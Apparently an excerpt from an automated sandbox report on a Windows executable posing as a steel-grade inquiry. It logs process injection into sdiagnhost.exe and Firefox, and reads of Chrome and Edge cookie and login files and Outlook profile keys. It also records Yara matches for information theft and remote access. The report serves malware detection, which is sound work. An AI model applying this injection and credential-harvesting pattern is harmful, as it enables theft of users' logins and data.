Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Section loaded: NULL target: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Section loaded: NULL target: C:\Windows\SysWOW64\sdiagnhost.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: NULL target: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: NULL target: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write			Jump to behavior

Source: C:\Windows\SysWOW64\sdiagnhost.exe

Thread register set: target process: 5956

Jump to behavior

Source: C:\Windows\SysWOW64\sdiagnhost.exe

Thread APC queued: target process: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe

Jump to behavior

Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Process created: C:\Windows\SysWOW64\sdiagnhost.exe "C:\Windows\SysWOW64\sdiagnhost.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"			Jump to behavior

Source: 1h36yydaHEcruJ.exe, 00000009.00000000.1280393616.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, 1h36yydaHEcruJ.exe, 00000009.00000002.2112444435.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, 1h36yydaHEcruJ.exe, 0000000B.00000000.1431026219.0000000001200000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: 1h36yydaHEcruJ.exe, 00000009.00000000.1280393616.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, 1h36yydaHEcruJ.exe, 00000009.00000002.2112444435.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, 1h36yydaHEcruJ.exe, 0000000B.00000000.1431026219.0000000001200000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: 1h36yydaHEcruJ.exe, 00000009.00000000.1280393616.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, 1h36yydaHEcruJ.exe, 00000009.00000002.2112444435.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, 1h36yydaHEcruJ.exe, 0000000B.00000000.1431026219.0000000001200000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: 1h36yydaHEcruJ.exe, 00000009.00000000.1280393616.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, 1h36yydaHEcruJ.exe, 00000009.00000002.2112444435.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, 1h36yydaHEcruJ.exe, 0000000B.00000000.1431026219.0000000001200000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Stealing of Sensitive Information

Source: Yara match	File source: 0.2.INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2110804332.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2112513266.0000000004930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2113082750.0000000004F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2112607826.0000000004980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1356628507.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1357208647.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2112450897.0000000000C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1357255584.00000000030F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies			Jump to behavior

Source: C:\Windows\SysWOW64\sdiagnhost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Source: Yara match	File source: 0.2.INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2110804332.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2112513266.0000000004930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2113082750.0000000004F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2112607826.0000000004980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1356628507.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1357208647.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2112450897.0000000000C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1357255584.00000000030F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY